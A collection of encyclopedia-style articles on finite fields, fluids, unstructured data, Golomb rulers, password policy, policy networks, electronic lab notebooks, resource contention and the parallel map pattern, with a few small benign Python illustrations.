Similarly, many theoretical problems in number theory can be solved by considering their reductions modulo some or all prime numbers. See, for example, the Hasse principle. Many recent developments of algebraic geometry were motivated by the need to enlarge the power of these modular methods. Wiles' proof of Fermat's Last Theorem is an example of a deep result involving many mathematical tools, including finite fields.
The Weil conjectures concern the number of points on algebraic varieties over finite fields, and the theory has many applications including exponential and character sum estimates.
Finite fields have widespread application in combinatorics, two well-known examples being the definition of Paley graphs and the related construction for Hadamard matrices. In arithmetic combinatorics, finite fields[7] and finite field models[8][9] are used extensively, such as in Szemerédi's theorem on arithmetic progressions.
A division ring is a generalization of a field. Division rings are not assumed to be commutative. There are no non-commutative finite division rings: Wedderburn's little theorem states that all finite division rings are commutative, and hence are finite fields. This result holds even if we relax the associativity axiom to alternativity, that is, all finite alternative division rings are finite fields, by the Artin–Zorn theorem.[10]
A finite field F is not algebraically closed: the polynomial
{\displaystyle f(T)=1+\prod _{\alpha \in F}(T-\alpha ),}
has no roots in F, since f(α) = 1 for all α in F.
Given a prime number p, let F̄_p be an algebraic closure of F_p. It is not only unique up to an isomorphism, as are all algebraic closures, but, contrary to the general case, all its subfields are fixed by all its automorphisms, and it is also the algebraic closure of all finite fields of the same characteristic p.
This property results mainly from the fact that the elements of F_{p^n} are exactly the roots of x^{p^n} − x, and this defines an inclusion F_{p^n} ⊂ F_{p^{nm}} for m > 1. These inclusions allow writing informally F̄_p = ⋃_{n≥1} F_{p^n}. The formal validation of this notation results from the fact that the above field inclusions form a directed set of fields; its direct limit is F̄_p, which may thus be considered as a "directed union".
Given a primitive element g of F_{q^{mn}}, the power g^{(q^{mn}−1)/(q^n−1)} is a primitive element of F_{q^n}.
For explicit computations, it may be useful to have a coherent choice of the primitive elements for all finite fields; that is, to choose the primitive element g_n of F_{q^n} in such a way that, whenever m divides n, one has g_m = g_n^{(q^n−1)/(q^m−1)}, where g_m is the primitive element already chosen for F_{q^m}.
Such a construction may be obtained by Conway polynomials.
Although finite fields are not algebraically closed, they are quasi-algebraically closed, which means that every homogeneous polynomial over a finite field has a non-trivial zero whose components are in the field if the number of its variables is more than its degree. This was a conjecture of Artin and Dickson proved by Chevalley (see the Chevalley–Warning theorem).
https://en.wikipedia.org/wiki/Finite_field#Frobenius_automorphism_and_Galois_theory
In physics, a fluid is a liquid, gas, or other material that may continuously move and deform (flow) under an applied shear stress, or external force.[1] Fluids have zero shear modulus, or, in simpler terms, are substances which cannot resist any shear force applied to them.
Although the term fluid generally includes both the liquid and gas phases, its definition varies among branches of science. Definitions of solid vary as well, and depending on the field, some substances can have both fluid and solid properties.[2] Non-Newtonian fluids like Silly Putty appear to behave similarly to a solid when a sudden force is applied.[3] Substances with a very high viscosity such as pitch appear to behave like a solid (see the pitch drop experiment) as well. In particle physics, the concept is extended to include fluidic matters other than liquids or gases.[4] A fluid in medicine or biology refers to any liquid constituent of the body (body fluid),[5][6] whereas "liquid" is not used in this sense. Sometimes liquids given for fluid replacement, either by drinking or by injection, are also called fluids[7] (e.g. "drink plenty of fluids"). In hydraulics, fluid is a term which refers to liquids with certain properties, and is broader than (hydraulic) oils.[8]
Fluids display properties such as:
These properties are typically a function of their inability to support a shear stress in static equilibrium. By contrast, solids respond to shear either with a spring-like restoring force (meaning that deformations are reversible), or they require a certain initial stress before they deform (see plasticity).
Solids respond with restoring forces to both shear stresses and to normal stresses, both compressive and tensile. By contrast, ideal fluids only respond with restoring forces to normal stresses, called pressure: fluids can be subjected both to compressive stress, corresponding to positive pressure, and to tensile stress, corresponding to negative pressure. Solids and liquids both have tensile strengths, which when exceeded in solids create irreversible deformation and fracture, and in liquids cause the onset of cavitation.
Both solids and liquids have free surfaces, which cost some amount of free energy to form. In the case of solids, the amount of free energy to form a given unit of surface area is called surface energy, whereas for liquids the same quantity is called surface tension. In response to surface tension, the ability of liquids to flow results in behaviour differing from that of solids, though at equilibrium both tend to minimise their surface energy: liquids tend to form rounded droplets, whereas pure solids tend to form crystals. Gases, lacking free surfaces, freely diffuse.
In a solid, shear stress is a function of strain, but in a fluid, shear stress is a function of strain rate. A consequence of this behavior is Pascal's law, which describes the role of pressure in characterizing a fluid's state.
The behavior of fluids can be described by the Navier–Stokes equations, a set of partial differential equations which are based on:
The study of fluids is fluid mechanics, which is subdivided into fluid dynamics and fluid statics depending on whether the fluid is in motion.
Depending on the relationship between shear stress and the rate of strain and its derivatives, fluids can be characterized as one of the following:
Newtonian fluids follow Newton's law of viscosity and may be called viscous fluids.
Fluids may be classified by their compressibility:
Newtonian and incompressible fluids do not actually exist, but are assumed to be so for theoretical treatment. Virtual fluids that completely ignore the effects of viscosity and compressibility are called perfect fluids.
https://en.wikipedia.org/wiki/Fluid
Unstructured data (or unstructured information) is information that either does not have a pre-defined data model or is not organized in a pre-defined manner. Unstructured information is typically text-heavy, but may contain data such as dates, numbers, and facts as well. This results in irregularities and ambiguities that make it difficult to understand using traditional programs as compared to data stored in fielded form in databases or annotated (semantically tagged) in documents.
In 1998, Merrill Lynch said "unstructured data comprises the vast majority of data found in an organization, some estimates run as high as 80%."[1] It is unclear what the source of this number is, but nonetheless it is accepted by some.[2] Other sources have reported similar or higher percentages of unstructured data.[3][4][5]
As of 2012, IDC and Dell EMC projected that data would grow to 40 zettabytes by 2020, resulting in a 50-fold growth from the beginning of 2010.[6] More recently, IDC and Seagate predict that the global datasphere will grow to 163 zettabytes by 2025,[7] and the majority of that will be unstructured. Computerworld magazine states that unstructured information might account for more than 70–80% of all data in organizations.[1]
The earliest research into business intelligence focused on unstructured textual data, rather than numerical data.[8] As early as 1958, computer science researchers like H.P. Luhn were particularly concerned with the extraction and classification of unstructured text.[8] However, only since the turn of the century has the technology caught up with the research interest. In 2004, the SAS Institute developed the SAS Text Miner, which uses Singular Value Decomposition (SVD) to reduce a hyper-dimensional textual space into smaller dimensions for significantly more efficient machine analysis.[9] The mathematical and technological advances sparked by machine textual analysis prompted a number of businesses to research applications, leading to the development of fields like sentiment analysis, voice of the customer mining, and call center optimization.[10] The emergence of Big Data in the late 2000s led to a heightened interest in the applications of unstructured data analytics in contemporary fields such as predictive analytics and root cause analysis.[11]
The term is imprecise for several reasons:
Techniques such as data mining, natural language processing (NLP), and text analytics provide different methods to find patterns in, or otherwise interpret, this information. Common techniques for structuring text usually involve manual tagging with metadata or part-of-speech tagging for further text mining-based structuring. The Unstructured Information Management Architecture (UIMA) standard provided a common framework for processing this information to extract meaning and create structured data about the information.
Software that creates machine-processable structure can utilize the linguistic, auditory, and visual structure that exists in all forms of human communication.[12] Algorithms can infer this inherent structure from text, for instance, by examining word morphology, sentence syntax, and other small- and large-scale patterns. Unstructured information can then be enriched and tagged to address ambiguities, and relevancy-based techniques then used to facilitate search and discovery. Examples of "unstructured data" may include books, journals, documents, metadata, health records, audio, video, analog data, images, files, and unstructured text such as the body of an e-mail message, Web page, or word-processor document. While the main content being conveyed does not have a defined structure, it generally comes packaged in objects (e.g. in files or documents) that themselves have structure and are thus a mix of structured and unstructured data, but collectively this is still referred to as "unstructured data".[13] For example, an HTML web page is tagged, but HTML mark-up typically serves solely for rendering. It does not capture the meaning or function of tagged elements in ways that support automated processing of the information content of the page. XHTML tagging does allow machine processing of elements, although it typically does not capture or convey the semantic meaning of tagged terms.
Since unstructured data commonly occurs in electronic documents, the use of a content or document management system which can categorize entire documents is often preferred over data transfer and manipulation from within the documents. Document management thus provides the means to convey structure onto document collections.
Search engines have become popular tools for indexing and searching through such data, especially text.
Specific computational workflows have been developed to impose structure upon the unstructured data contained within text documents. These workflows are generally designed to handle sets of thousands or even millions of documents, far more than manual approaches to annotation may permit. Several of these approaches are based upon the concept of online analytical processing, or OLAP, and may be supported by data models such as text cubes.[14] Once document metadata is available through a data model, generating summaries of subsets of documents (i.e., cells within a text cube) may be performed with phrase-based approaches.[15]
Biomedical research generates one major source of unstructured data, as researchers often publish their findings in scholarly journals. Though the language in these documents is challenging to derive structural elements from (e.g., due to the complicated technical vocabulary contained within and the domain knowledge required to fully contextualize observations), the results of these activities may yield links between technical and medical studies[16] and clues regarding new disease therapies.[17] Recent efforts to enforce structure upon biomedical documents include self-organizing map approaches for identifying topics among documents,[18] general-purpose unsupervised algorithms,[19] and an application of the CaseOLAP workflow[15] to determine associations between protein names and cardiovascular disease topics in the literature.[20] CaseOLAP defines phrase-category relationships in an accurate (identifies relationships), consistent (highly reproducible), and efficient manner. This platform offers enhanced accessibility and empowers the biomedical community with phrase-mining tools for widespread biomedical research applications.[20]
In Sweden (EU), pre 2018, some data privacy regulations did not apply if the data in question was confirmed as "unstructured".[21]This terminology, unstructured data, is rarely used in the EU afterGDPRcame into force in 2018. GDPR does neither mention nor define "unstructured data". It does use the word "structured" as follows (without defining it);
GDPR Case-law on what defines a "filing system"; "the specific criterion and the specific form in which the set of personal data collected by each of the members who engage in preaching is actually structured is irrelevant, so long as that set of data makes it possible for the data relating to a specific person who has been contacted to beeasily retrieved, which is however for the referring court to ascertain in the light of all the circumstances of the case in the main proceedings.” (CJEU,Todistajat v. Tietosuojavaltuutettu, Jehovan, Paragraph 61).
If personal data is easily retrieved, then it is a filing system, and then it is in scope for GDPR regardless of being "structured" or "unstructured". Most electronic systems today, subject to access and applied software, can allow for easy retrieval of data.
|
https://en.wikipedia.org/wiki/Unstructured_data
|
In mathematics, a Golomb ruler is a set of marks at integer positions along a ruler such that no two pairs of marks are the same distance apart. The number of marks on the ruler is its order, and the largest distance between two of its marks is its length. Translation and reflection of a Golomb ruler are considered trivial, so the smallest mark is customarily put at 0 and the next mark at the smaller of its two possible values. Golomb rulers can be viewed as a one-dimensional special case of Costas arrays.
The Golomb ruler was named for Solomon W. Golomb and discovered independently by Sidon (1932)[1] and Babcock (1953). Sophie Piccard also published early research on these sets, in 1939, stating as a theorem the claim that two Golomb rulers with the same distance set must be congruent. This turned out to be false for six-point rulers, but true otherwise.[2]
There is no requirement that a Golomb ruler be able to measure all distances up to its length, but if it does, it is called a perfect Golomb ruler. It has been proved that no perfect Golomb ruler exists for five or more marks.[3] A Golomb ruler is optimal if no shorter Golomb ruler of the same order exists. Creating Golomb rulers is easy, but proving that a ruler is optimal for a specified order is computationally very challenging.
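The gap between constructing rulers and proving optimality can be illustrated with a toy exhaustive search. The sketch below is our own illustration for very small orders only; real optimality proofs, such as distributed.net's, use far more sophisticated pruning and vastly more compute:

```python
from itertools import combinations

def is_golomb(marks):
    """True if all pairwise differences between the marks are distinct."""
    diffs = [b - a for a, b in combinations(marks, 2)]
    return len(diffs) == len(set(diffs))

def optimal_ruler(order):
    """Find a shortest Golomb ruler with `order` marks by trying each
    length n in increasing order and enumerating every candidate set
    of marks in {0, ..., n}. Exponential; feasible only for tiny orders."""
    n = order - 1
    while True:
        for inner in combinations(range(1, n), order - 2):
            marks = (0,) + inner + (n,)
            if is_golomb(marks):
                return marks
        n += 1
```

For example, `optimal_ruler(4)` returns `(0, 1, 4, 6)`, the optimal order-4 ruler of length 6.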
Distributed.net has completed distributed massively parallel searches for optimal order-24 through order-28 Golomb rulers, each time confirming the suspected candidate ruler.[4][5][6][7][8]
Currently, the complexity of finding optimal Golomb rulers (OGRs) of arbitrary order n (where n is given in unary) is unknown. In the past there was some speculation that it is an NP-hard problem.[3] Problems related to the construction of Golomb rulers have been proved to be NP-hard, where it is also noted that no known NP-complete problem has a similar flavor to finding Golomb rulers.[9]
A set of integers A = {a_1, a_2, ..., a_m} where a_1 < a_2 < ... < a_m is a Golomb ruler if and only if every difference between two distinct marks occurs in only one way; formally, for all i, j, k, l with i > j and k > l, a_i − a_j = a_k − a_l implies i = k and j = l.
The order of such a Golomb ruler is m and its length is a_m − a_1. The canonical form has a_1 = 0 and, if m > 2, a_2 − a_1 < a_m − a_{m−1}. Such a form can be achieved through translation and reflection.
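The definition and the canonicalization by translation and reflection translate directly into code; a small sketch (function names are our own):

```python
from itertools import combinations

def is_golomb_ruler(marks):
    """A set of integers is a Golomb ruler iff all pairwise
    differences between its marks are distinct."""
    marks = sorted(marks)
    diffs = [b - a for a, b in combinations(marks, 2)]
    return len(diffs) == len(set(diffs))

def canonical_form(marks):
    """Translate so the smallest mark is 0; reflect if the first gap
    exceeds the last gap, so the second mark takes the smaller of its
    two possible values."""
    marks = sorted(marks)
    translated = [m - marks[0] for m in marks]
    if len(marks) > 2 and translated[1] - translated[0] > translated[-1] - translated[-2]:
        length = translated[-1]
        translated = sorted(length - m for m in translated)
    return translated
```

For instance, `canonical_form([0, 2, 5, 6])` yields `[0, 1, 4, 6]`: the ruler is reflected because its first gap (2) is larger than its last gap (1).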
An injective function f : {1, 2, ..., m} → {0, 1, ..., n} with f(1) = 0 and f(m) = n is a Golomb ruler if and only if, for all i, j, k, l with i > j and k > l, f(i) − f(j) = f(k) − f(l) implies i = k and j = l.
The order of such a Golomb ruler is m and its length is n. The canonical form has f(2) − f(1) < f(m) − f(m − 1).
A Golomb ruler of order m with length n may be optimal in either of two respects:[11]: 237 it may be optimally dense, exhibiting maximal m for the given value of n, or it may be optimally short, exhibiting minimal n for the given value of m.
The general term optimal Golomb ruler is used to refer to the second type of optimality.
Golomb rulers are used within information theory related to error correcting codes.[13]
Golomb rulers are used in the selection of radio frequencies to reduce the effects of intermodulation interference with both terrestrial[14] and extraterrestrial[15] applications.
Golomb rulers are used in the design of phased arrays of radio antennas. In radio astronomy one-dimensional synthesis arrays can have the antennas in a Golomb ruler configuration in order to obtain minimum redundancy of the Fourier component sampling.[16][17]
Multi-ratio current transformers use Golomb rulers to place transformer tap points.
A number of construction methods produce asymptotically optimal Golomb rulers.
The following construction, due to Paul Erdős and Pál Turán, produces a Golomb ruler for every odd prime p.[12]
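The marks of this construction are usually quoted as 2pk + (k² mod p) for k = 0, 1, ..., p − 1, giving a ruler of order p with length a little under 2p². A sketch using that commonly cited form (stated here without derivation):

```python
from itertools import combinations

def erdos_turan_ruler(p):
    """Marks 2*p*k + (k*k mod p) for k = 0..p-1; a Golomb ruler
    whenever p is an odd prime."""
    return [2 * p * k + (k * k) % p for k in range(p)]

def is_golomb(marks):
    """Check the Golomb property: all pairwise differences distinct."""
    diffs = [b - a for a, b in combinations(marks, 2)]
    return len(diffs) == len(set(diffs))
```

For p = 5 this yields [0, 11, 24, 34, 41], whose ten pairwise differences are all distinct.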
The following table contains all known optimal Golomb rulers, excluding those with marks in the reverse order. The first four are perfect.
^ *The optimal ruler would have been known before this date; this date represents the date when it was discovered to be optimal (because all other rulers were proved not to be shorter). For example, the ruler that turned out to be optimal for order 26 was recorded on 10 October 2007, but it was not known to be optimal until all other possibilities were exhausted on 24 February 2009.
|
https://en.wikipedia.org/wiki/Golomb_Ruler
|
A password policy is a set of rules designed to enhance computer security by encouraging users to employ strong passwords and use them properly. A password policy is often part of an organization's official regulations and may be taught as part of security awareness training. Either the password policy is merely advisory, or the computer systems force users to comply with it. Some governments have national authentication frameworks[1] that define requirements for user authentication to government services, including requirements for passwords.
The United States Department of Commerce's National Institute of Standards and Technology (NIST) has put out two standards for password policies which have been widely followed.
From 2004, "NIST Special Publication 800-63. Appendix A"[2] advised people to use irregular capitalization, special characters, and at least one numeral. This was the advice most systems followed, and it was "baked into" a number of standards that businesses needed to follow.
However, a major update in 2017 changed this advice, notably the position that forcing complexity and regular password changes is now seen as bad practice.[3][4]: 5.1.1.2
The key points of these are:
NIST included a rationale for the new guidelines in its Appendix A.
Typical components of a password policy include:
Many policies require a minimum password length. Eight characters is typical but may not be appropriate.[6][7][8] Longer passwords are almost always more secure, but some systems impose a maximum length for compatibility with legacy systems.
Some policies suggest or impose requirements on what type of password a user can choose, such as:
Other systems create an initial password for the user, but require them to change it to one of their own choosing within a short interval.
Password block lists are lists of passwords that are always blocked from use. Block lists contain passwords constructed of character combinations that otherwise meet company policy, but should no longer be used because they have been deemed insecure for one or more reasons, such as being easily guessed, following a common pattern, or public disclosure from previous data breaches. Common examples are Password1, Qwerty123, or Qaz123wsx.
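In practice a block-list check usually normalizes the candidate before comparison, so that trivial variants of a blocked password are also rejected. A hypothetical sketch; the list contents and normalization rules here are invented for illustration, not taken from any particular product:

```python
# Block list stored in lowercase base form.
BLOCK_LIST = {"password", "qwerty123", "qaz123wsx", "letmein"}

# Undo a few common character substitutions ("leetspeak").
LEET = str.maketrans({"@": "a", "$": "s", "0": "o", "1": "i", "3": "e"})

def is_blocked(candidate: str) -> bool:
    """Reject a candidate if any normalized form appears on the block list."""
    lowered = candidate.lower()
    forms = {
        lowered,
        lowered.translate(LEET),       # "P@ssw0rd" -> "password"
        lowered.rstrip("0123456789"),  # "Password1" -> "password"
    }
    return not forms.isdisjoint(BLOCK_LIST)
```

With these rules, `is_blocked("P@ssw0rd")` and `is_blocked("Password1")` are both true, while an unrelated passphrase passes.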
Some policies require users to change passwords periodically, often every 90 or 180 days. The benefit of password expiration, however, is debatable.[9][10] Systems that implement such policies sometimes prevent users from picking a password too close to a previous selection.[11]
This policy can often backfire. Some users find it hard to devise "good" passwords that are also easy to remember, so if people are required to choose many passwords because they have to change them often, they end up using much weaker passwords; the policy also encourages users to write passwords down. Also, if the policy prevents a user from repeating a recent password, this requires that there is a database in existence of everyone's recent passwords (or their hashes) instead of having the old ones erased from memory. Finally, users may change their password repeatedly within a few minutes, and then change back to the one they really want to use, circumventing the password change policy altogether.
The human aspects of passwords must also be considered. Unlike computers, human users cannot delete one memory and replace it with another. Consequently, frequently changing a memorized password is a strain on the human memory, and most users resort to choosing a password that is relatively easy to guess (see password fatigue). Users are often advised to use mnemonic devices to remember complex passwords. However, if the password must be repeatedly changed, mnemonics are useless because the user would not remember which mnemonic to use. Furthermore, the use of mnemonics (leading to passwords such as "2BOrNot2B") makes the password easier to guess.
Administration factors can also be an issue. Users sometimes have older devices that still hold a password that was in use before the password duration expired. In order to manage these older devices, users may have to resort to writing down all old passwords in case they need to log into an older device.
Requiring a very strong password and not requiring it be changed is often better.[12]However, this approach does have a major drawback: if an unauthorized person acquires a password and uses it without being detected, that person may have access for an indefinite period.
It is necessary to weigh these factors: the likelihood of someone guessing a password because it is weak, versus the likelihood of someone managing to steal, or otherwise acquire without guessing, a stronger password.
Bruce Schneier argues that "pretty much anything that can be remembered can be cracked", and recommends a scheme that uses passwords which will not appear in any dictionaries.[13]
Password policies may include progressive sanctions beginning with warnings and ending with possible loss of computer privileges or job termination. Where confidentiality is mandated by law, e.g. with classified information, a violation of password policy could be a criminal offense in some jurisdictions.[14] Some consider a convincing explanation of the importance of security to be more effective than threats of sanctions.
The level of password strength required depends, among other things, on how easy it is for an attacker to submit multiple guesses. Some systems limit the number of times a user can enter an incorrect password before some delay is imposed or the account is frozen. At the other extreme, some systems make available a specially hashed version of the password, so that anyone can check its validity. When this is done, an attacker can try passwords very rapidly; so much stronger passwords are necessary for reasonable security. (See password cracking and password length equation.) Stricter requirements are also appropriate for accounts with higher privileges, such as root or system administrator accounts.
Password policies are usually a tradeoff between theoretical security and the practicalities of human behavior. For example:
A 2010 examination of the password policies of 75 different websites concludes that security only partly explains more stringent policies: monopoly providers of a service, such as government sites, have more stringent policies than sites where consumers have choice (e.g. retail sites and banks). The study concludes that sites with more stringent policies "do not have greater security concerns, they are simply better insulated from the consequences from poor usability."[15]
Other approaches are available that are generally considered to be more secure than simple passwords. These include use of a security token or one-time password system, such as S/Key, or multi-factor authentication.[16] However, these systems heighten the tradeoff between security and convenience: according to Shuman Ghosemajumder, these systems all improve security, but come "at the cost of moving the burden to the end user."[17]
|
https://en.wikipedia.org/wiki/Password_policy
|
Policy network analysis is a field of research in political science focusing on the links and interdependence between sections of government and other societal actors, aiming to understand the policy-making process and public policy outcomes.[1]
Although the number of definitions is almost as large as the number of analytical approaches, Rhodes[1]: 426 aims to offer a minimally exclusive starting point: "Policy networks are sets of formal institutional and informal linkages between governmental and other actors structured around shared if endlessly negotiated beliefs and interests in public policy making and implementation."
As Thatcher[2]: 391 notes, policy network approaches initially aimed to model specific forms of state-interest group relations, without giving exhaustive typologies.
The most widely used paradigm of the 1970s and 1980s analyzed only two specific types of policy networks: policy communities and issue networks. The use of these concepts was justified by empirical case studies.[2]
Policy communities refer to relatively slowly changing networks that define the context of policy-making in specific policy segments. The network links are generally perceived as the relational ties between bureaucrats, politicians and interest groups. The main characteristic of policy communities – compared to issue networks – is that the boundaries of the networks are more stable and more clearly defined. This concept was studied in the context of policy-making in the United Kingdom.[2]
In contrast, issue networks – a concept established in the literature on United States government – refer to a looser system in which a relatively large number of stakeholders are involved. Non-government actors in these networks usually include not only interest group representatives but also professional or academic experts. An important characteristic of issue networks is that membership is constantly changing, interdependence is often asymmetric and – compared to policy communities – it is harder to identify dominant actors.[3]
New typological approaches appeared in the late 1980s and early 1990s with the aim of grouping policy networks into a system of mutually exclusive and collectively exhaustive categories.[2] One possible logic of typology is based on the degree of integration, membership size and distribution of resources in the network. This categorization – perhaps most importantly represented by R. A. W. Rhodes – allows the combination of policy communities and issue networks with categories like professional network, intergovernmental network and producer network.[4] Other approaches identify categories based on distinct patterns of state-interest group relations. Patterns include corporatism and pluralism, iron triangles, subgovernment and clientelism, while the differentiation is based on membership, stability and sectorality.[5]
As the field of policy network analysis has grown since the late 20th century, scholars have developed competing descriptive, theoretical and prescriptive accounts. Each type gives different specific content to the term policy network and uses different research methodologies.[1]
For several authors, policy networks describe specific forms of government policy-making. The three most important forms are interest intermediation, interorganizational analysis, and governance.[1]
In an approach developed from the literature on US pluralism, policy networks are often analyzed in order to identify the most important actors influencing governmental decision-making. From this perspective, a network-based assessment is useful to describe power positions, the structure of oligopoly in political markets, and the institutions of interest negotiation.[1]
Another branch of descriptive literature, which emerged from the study of European politics, aims to understand the interdependency in decision-making between formal political institutions and the corresponding organizational structures. This viewpoint emphasizes the importance of overlapping organizational responsibilities and the distribution of power in shaping specific policy outcomes.[6]
A third direction of descriptive scholarship is to describe general patterns of policy-making – the formal institutions of power-sharing between government, independent state bodies and the representatives of employer and labor interests.[7][8]
The two most important theoretical approaches aiming to understand and explain actors' behavior in policy networks are the following: power dependence and rational choice.[1]
In power dependence models, policy networks are understood as mechanisms for exchanging resources between organizations in the network. The dynamic of exchange is determined by the comparative value of resources (e.g. legal, political or financial) and individual capacities to deploy them in order to create better bargaining positions and achieve higher degrees of autonomy.[1]
In policy network analysis, theorists complement standard rational choice arguments with the insights of new institutionalism. This "actor-centered institutionalism" is used to describe policy networks as structural arrangements between relatively stable sets of public and private players. Rational choice theorists identify links between network actors as channels to exchange multiple goods (e.g. knowledge, resources and information).[1]
The prescriptive literature on policy networks focuses on the phenomenon's role in constraining or enabling certain governmental action. From this viewpoint, networks are seen as central elements of the realm of policy-making, at least partially defining the desirability of the status quo – and thus a possible target of reform initiatives.[1] The three most common network management approaches are the following: instrumental (a focus on altering dependency relations), institutional (a focus on rules, incentives and culture) and interactive (a focus on communication and negotiation).[9]
As Rhodes[1] points out, there is a long-lasting debate in the field about general theories predicting the emergence of specific networks and corresponding policy outcomes depending on specific conditions. No theories have succeeded in achieving this level of generality yet, and some scholars doubt they ever will. Other debates focus on describing and theorizing change in policy networks. While some political scientists state that this might not be possible,[10] other scholars have made efforts towards understanding policy network dynamics. One example is the advocacy coalition framework, which aims to analyze the effect of commonly represented beliefs (in coalitions) on policy outcomes.[1][11]
|
https://en.wikipedia.org/wiki/Policy_network_analysis
|
An electronic lab notebook or electronic laboratory notebook (ELN) is a computer program designed to replace paper laboratory notebooks. Lab notebooks in general are used by scientists, engineers, and technicians to document research, experiments, and procedures performed in a laboratory. A lab notebook is often maintained to be a legal document and may be used in a court of law as evidence. Similar to an inventor's notebook, the lab notebook is also often referred to in patent prosecution and intellectual property litigation.
Electronic lab notebooks offer many benefits to the user as well as organizations; they are easier to search, simplify data copying and backups, and support collaboration amongst many users.[1] ELNs can have fine-grained access controls, and can be more secure than their paper counterparts.[2] They also allow the direct incorporation of data from instruments, replacing the practice of printing out data to be stapled into a paper notebook.[3]
ELNs can be divided into two categories:
Solutions range from specialized programs designed from the ground up for use as an ELN, to modifications or direct use of more general programs. Examples of using more general software as an ELN include using OpenWetWare, a MediaWiki install (running the same software that Wikipedia uses), WordPress,[4] or general note-taking software such as OneNote.[5][3]
ELNs come in many different forms. They can be standalone programs, use a client-server model, or be entirely web-based. Some use a lab-notebook approach; others resemble a blog. ELNs are embracing artificial intelligence and LLM technology to provide scientific AI chat assistants.
A good many variations on the "ELN" acronym have appeared.[6] Differences between systems with different names are often subtle, with considerable functional overlap between them. Examples include "ERN" (Electronic Research Notebook), "ERMS" (Electronic Resource (or Research or Records) Management System (or Software)) and "SDMS" (Scientific Data (or Document) Management System (or Software)). Ultimately, these types of systems all strive to do the same thing: capture, record, centralize and protect scientific data in a way that is highly searchable, historically accurate, and legally stringent, and which also promotes secure collaboration, greater efficiency, reduced mistakes and lowered total research costs.
A good electronic laboratory notebook should offer a secure environment to protect the integrity of both data and process, whilst also affording the flexibility to adopt new processes or changes to existing processes without recourse to further software development. The package architecture should be modular, so as to minimize the validation costs of any subsequent changes made as needs change.
A good electronic laboratory notebook should be an "out of the box" solution that, as standard, has fully configurable forms to comply with the requirements of regulated analytical groups through to a sophisticated ELN for inclusion of structures, spectra, chromatograms, pictures, text, etc. where a preconfigured form is less appropriate. All data within the system may be stored in a database (e.g. MySQL, MS-SQL, Oracle) and be fully searchable. The system should enable data to be collected, stored and retrieved through any combination of forms or ELN that best meets the requirements of the user.
The application should enable secure forms to be generated that accept laboratory data input via PCs and/or laptops / palmtops, and should be directly linked to electronic devices such as laboratory balances, pH meters, etc. Networked or wireless communications should be accommodated by the package, allowing data to be interrogated, tabulated, checked, approved, stored and archived to comply with the latest regulatory guidance and legislation. A system should also include a scheduling option for routine procedures such as equipment qualification and study related timelines. It should include configurable qualification requirements to automatically verify that instruments have been cleaned and calibrated within a specified time period, that reagents have been quality-checked and have not expired, and that workers are trained and authorized to use the equipment and perform the procedures.
The laboratory accreditation criteria found in the ISO 17025 standard need to be considered for the protection and computer backup of electronic records. These criteria can be found specifically in clause 4.13.1.4 of the standard.[7]
Electronic lab notebooks used for development or research in regulated industries, such as medical devices or pharmaceuticals, are expected to comply with FDA regulations related to software validation. The purpose of the regulations is to ensure the integrity of the entries in terms of time, authorship, and content. Unlike ELNs for patent protection, FDA is not concerned with patent interference proceedings, but is concerned with avoidance of falsification. Typical provisions related to software validation are included in the medical device regulations at 21 CFR 820 (et seq.)[8] and Title 21 CFR Part 11.[9] Essentially, the requirements are that the software has been designed and implemented to be suitable for its intended purposes. Evidence to show that this is the case is often provided by a Software Requirements Specification (SRS) setting forth the intended uses and the needs that the ELN will meet; one or more testing protocols that, when followed, demonstrate that the ELN meets the requirements of the specification and that the requirements are satisfied under worst-case conditions. Security, audit trails, prevention of unauthorized changes without substantial collusion of otherwise independent personnel (i.e., those having no interest in the content of the ELN such as independent quality unit personnel) and similar tests are fundamental. Finally, one or more reports demonstrating the results of the testing in accordance with the predefined protocols are required prior to release of the ELN software for use. If the reports show that the software failed to satisfy any of the SRS requirements, then corrective and preventive action ("CAPA") must be undertaken and documented. Such CAPA may extend to minor software revisions, or changes in architecture or major revisions. CAPA activities need to be documented as well.
Aside from the requirements to follow such steps for regulated industry, such an approach is generally a good practice in terms of development and release of any software to assure its quality and fitness for use. There are standards related to software development and testing that can be applied (see ref.).
|
https://en.wikipedia.org/wiki/Electronic_lab_notebook
|
In computer science, resource contention is a conflict over access to a shared resource such as random access memory, disk storage, cache memory, internal buses or external network devices. A resource experiencing ongoing contention can be described as oversubscribed.
Resolving resource contention problems is one of the basic functions of operating systems. Various low-level mechanisms can be used to aid this, including locks, semaphores, mutexes and queues. The other techniques that can be applied by the operating systems include intelligent scheduling, application mapping decisions, and page coloring.[1][2]
Access to resources is also sometimes regulated by queuing; in the case of computing time on a CPU, the controlling algorithm of the task queue is called a scheduler.
Failure to properly resolve resource contention problems may result in a number of problems, including deadlock, livelock, and thrashing.
Resource contention results when multiple processes attempt to use the same shared resource. Access to memory areas is often controlled by semaphores, which allows a pathological situation called a deadlock, when different threads or processes try to allocate resources already allocated by each other. A deadlock usually leads to a program becoming partially or completely unresponsive.
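The two-lock deadlock, and the standard fix of imposing a single global acquisition order, can be sketched with Python's threading primitives standing in for OS-level mutexes (an illustrative sketch of our own, not production code):

```python
import threading

lock_a = threading.Lock()
lock_b = threading.Lock()
results = []

# Deadlock-prone pattern: one thread takes A then B while another
# takes B then A; each can end up holding one lock and waiting
# forever for the other. The helper below instead always acquires
# the locks in one globally agreed order (here: by id()), which
# makes a circular wait, and hence deadlock, impossible.
def with_both(first, second, work):
    lo, hi = sorted((first, second), key=id)
    with lo:
        with hi:
            work()

t1 = threading.Thread(target=with_both,
                      args=(lock_a, lock_b, lambda: results.append("t1")))
t2 = threading.Thread(target=with_both,
                      args=(lock_b, lock_a, lambda: results.append("t2")))
t1.start(); t2.start()
t1.join(); t2.join()
# Both threads finish despite requesting the locks in opposite orders.
```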
In recent years, research on contention has focused more on the resources in the memory hierarchy, e.g., last-level caches, the front-side bus, and memory socket connections.
|
https://en.wikipedia.org/wiki/Resource_contention
|
Map is an idiom in parallel computing where a simple operation is applied to all elements of a sequence, potentially in parallel.[1] It is used to solve embarrassingly parallel problems: those problems that can be decomposed into independent subtasks, requiring no communication/synchronization between the subtasks except a join or barrier at the end.
When applying the map pattern, one formulates an elemental function that captures the operation to be performed on a data item that represents a part of the problem, then applies this elemental function in one or more threads of execution, hyperthreads, SIMD lanes or on multiple computers.
Some parallel programming systems, such as OpenMP and Cilk, have language support for the map pattern in the form of a parallel for loop;[2] languages such as OpenCL and CUDA support elemental functions (as "kernels") at the language level. The map pattern is typically combined with other parallel design patterns. For example, map combined with category reduction gives the MapReduce pattern.[3]: 106–107
